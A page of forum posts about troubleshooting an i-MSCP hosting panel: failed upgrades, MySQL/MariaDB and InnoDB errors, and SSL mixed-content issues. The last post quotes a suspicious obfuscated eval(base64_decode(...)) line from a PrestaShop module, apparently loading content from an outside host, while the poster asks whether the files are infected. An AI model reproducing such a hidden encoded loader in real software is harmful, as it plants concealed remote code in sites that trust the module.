Posts by fulltilt

    got it back to mysql 5.1 and imscp 1.1.2
    not sure if an upgrade will work for now, is it possible testing an upgrade w/o changing files - dry run?

    --- edit ---
    If I click the user button in CP it get this error msg. is this because of the failed 1.1.5 update?

    1. SQLSTATE[HY093]: Invalid parameter number: no parameters were bound
    2. Query was:
    3. SELECT `admin_name`, `admin_status` FROM `admin` WHERE `admin_id` = ?

    just tried replace mysql 5.1 with mariadb 5.5 but the re-configuration fails with package errors
    re-installed mysql but it seems that apache is not working or fcgid has been changed to fastcgi
    also mail is not working:

    I tried to upgrade to 1.1.5 but getting this:
    iMSCP::Requirements::_programVersions: Unable to find PHP version: No output
    iMSCP::Execute::getExitCode: External command died with signal 11, without coredump

    main::setupAskServerIps: Unable to retrieve server IPs: Error while executing
    query: Unknown table engine 'InnoDB'
    iMSCP::Debug::END: Exit code: 1

    since activated Panel > only SSL
    the filemanager is not working anymore because of unsecure elements blocking by browsers ...
    the sourcecode shows image and css URLs in http instead of https
    in which config can I change usage for SSL?

    thank you, are all this files infected and should be removed?
    I have found this in a prestashop module:

    1. // Il est strictement interdit d'enlever ceci sous peine de poursuite pour la version gratuite.
    2. eval(base64_decode('CQkkdXJsID0gJ2h0dHA6Ly9yc3MuZGRseC5vcmcvc2l0ZXMueG1sJzsNCgkJJGNvbnRlbnQgPSAnJzsNCgkJJGNvbnRlbnUg$
    3. return $this->display(__FILE__, 'ddlx_xtreme_footer.tpl');
    4. }